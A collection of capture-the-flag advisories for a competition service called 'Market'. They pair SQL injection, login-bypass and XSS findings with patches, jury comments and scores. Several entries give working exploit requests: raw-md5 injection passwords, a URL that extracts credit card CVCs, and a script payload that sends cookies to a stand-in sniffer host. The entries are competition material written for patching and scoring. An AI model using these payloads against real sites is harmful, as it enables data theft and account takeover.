Market Advisories


Service:Market
Text:We can record the user names of existing ones, replacing them with a password on your own.
Fix:

cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\"")
rows = cursor.fetchall ()
if len(rows) > 0:
err += "\n<br />User is already registered"
Jury comment:Yep!
Score:1/1 point


Service:Market
Text:___________.__ ___________.__
\_ _____/| | __ _____ ___\_ _____/|__| ____ ____ ___________ ______
| __) | | | | \ \/ / | __) | |/ \ / ___\_/ __ \_ __ | ___/
| \ | |__| | /> < | \ | | | | /_/ > ___/| | \|___ \
\___ / |____/|____//__/\_ \ \___ / |__|___| |___ / \___ >__| /____ >
\/ Advisory \/ \/ \/_____/ \/ \/
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
Market has a SQL-Injection in the password parameter in every SQL-Query that uses it, because it stores the
md5 hashes as binary and not as a hex string.

Vulnerable code in auth.py and reg.mix.

--[ Patch ]--------------------------------------------------------------------
In every single SQL-Query in auth.py and reg.mix replace 'md5.new(passwd).digest()' with 'conn.escape_string(md5.new(passwd).digest())'

--[ Exploit ]------------------------------------------------------------------
You can get a arbitrary data by using this first request:

http://10.23.27.7:2121/reg.mix?login=kiki&pass=128&cpass=128&name=,concat(0x3a3a3a,(select cvc from credit limit 0,1),0x3a3a3a))-- -&cc=6666&cvc=6666&Sign+Up=Sign+Up

This request injects in the reg.mix query that inserts into the users table.
With the password 128 you get a '\' at the end of the md5 raw hash and you can escape
the quotes and have the name field as your payload. With a select subquery you can get arbitrary
data out of the database and insert it into the name field of the user in the users table.

With the second request

http://10.23.27.7:2121/status.mix?alogin=kiki&apass=583735&Sign+In=Sign+In

you bypasses the login for the created user. The number 583735 in a raw md5 hash contains '"|"'
and causes the condition to be true. The website welcomes you with the name of the user that is stored in the
users table and so you can read the result of your injection.
Jury comment:yep!
Score:7/7 points


Service:Market
Text:Advisory
* Description
Possible sql injection via a raw md5 value in reg.mix and auth.py

* Patch
reg.mix:
105 #cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + md5.new(passwd).digest() + "\"")
106 cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + conn.escape_string(md5.new(passwd).digest()) + "\"")

auth.py:
65 #cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + md5.new(passwd).digest() + "\"")
66 cursor.execute ("SELECT * FROM users WHERE login=\"" + conn.escape_string(login) + "\" and pass=\"" + conn.escape_string(md5.new(passwd).digest()) + "\"")

* Exploit

1. retreive login name for gameserver user via http://#{ip}:2121/sell.mix
2. use the retreived login name and as password "1319" which is a valid sql injection when converted to the corresponding md5 hash
3. retreive flags (http://#{ip}:2121/requests.mix)
4. submit flags
Jury comment:Ok =) done.
Score:3/3 points


Service:Market
Text:It is possible to bruteforce flags char by char in check.mix script:
http://10.23.x.3:2121/check.mix?content=$brutehere$&idu=[idu]&ida=[ida]&Sell=Sell

patch:
in check.mix replace line 108 with something like this:
cursor.execute ("SELECT * FROM purchaseAd WHERE ida=" + str(ida) + " AND content LIKE \"" + conn.escape_string(str(cont)) + "\"")
Jury comment:Exploit?
Score:2/5 points


Service:Market
Text:XSS

File:
requests.mix

content += mtemplates.myreq(title, publicity, cont, cost, ida, message, sendtime, done, idr)

In parameters "title, publicity, cont, cost, ida, message, sendtime, done, idr" not filtred html-entity.

Patch:
Replace to
content += mtemplates.myreq(escape(title,1), escape(publicity,1), escape(cont,1), escape(cost,1), escape(ida,1), escape(message,1), escape(sendtime,1), escape(done,1), escape(idr,1))

Exploit:
From auth-user send message:
http://vulnbox:2121/msg.mix?idu=[idu]&ida=[ida]&message=<script>document.location="sniffer_ip?cookie="+document.cookie</script>
Jury comment:ok. use it.
Score:1/7 point